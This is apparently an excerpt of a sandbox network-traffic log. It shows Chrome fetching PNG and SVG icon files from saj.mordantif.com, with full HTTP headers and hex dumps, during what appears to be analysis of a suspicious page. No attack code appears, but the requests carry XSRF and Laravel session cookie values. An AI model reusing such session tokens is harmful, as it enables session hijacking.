                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC643INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 727
                                                        Connection: close
                                                        Content-Disposition: inline; filename="qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHqcaZNQEYHG6HvqrdLP1J%2Fe8hhSZqoHzTCol7p8Bs9FuRREgKcFXan52w0qKz513tfQDRj7mBW2eeQGqVNpFuqK6W%2BqRw7w9VmKAN%2FM1Yx3eInRiSCiPBvgplS48w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcf5dd38c83-EWR
                                                        2024-09-13 13:07:09 UTC726INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                        Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                        2024-09-13 13:07:09 UTC1INData Raw: 82
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.549816172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1451OUTGET /efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC667INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hgF0Cah%2BcvPA3TZZJB2L0byZqePIdROmfiV9%2F4XhU6CrA4mD7In%2Bb2l8uNfZe3ZhoDmdK5wg%2Fy8%2BNtINDx2oIxKp3T3DwSVHetMKruLR1t%2FH%2FLbIQ%2Fpg813hbBlaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcfbcc217e9-EWR
                                                        2024-09-13 13:07:09 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                        Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                        2024-09-13 13:07:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.549817172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1457OUTGET /ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC663INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luRc4kXBEaVsd%2BuYHHZk%2FZ4JdExohJOWjO%2BV0PEBdbWL2Rz7hxJaFyGKqvl986kUrP888fZyHpR4GNbeakjyW2VvAJatM3Z8Q5KacAAMpkAuSCZZYZjv1GisoupEnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcff8f34255-EWR
                                                        2024-09-13 13:07:09 UTC706INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                        Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 32 33 2e 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36
                                                        Data Ascii: 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36
                                                        Data Ascii: 09C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 34 38 32 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e
                                                        Data Ascii: 4824L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 34 34 2e 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37
                                                        Data Ascii: 44.7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47
                                                        2024-09-13 13:07:09 UTC1216INData Raw: 36 38 20 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33
                                                        Data Ascii: 68 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513
                                                        2024-09-13 13:07:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.549818172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1465OUTGET /wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC675INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nSxrxREY3zU%2Ffv6n5cUI2fmqLhE6ClotAWXFRo7nMvyF9FU0aap%2BFGkUbg1sz%2FLrMZGKTTF5cU5a99zAfWQtAgyR1A3yYNAlha%2B7itRLQYkR1GDjdjqvUxJA%2FQLsMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd029450f4a-EWR
                                                        2024-09-13 13:07:09 UTC694INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                        Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 37 36 41 32 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34
                                                        Data Ascii: 76A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.64
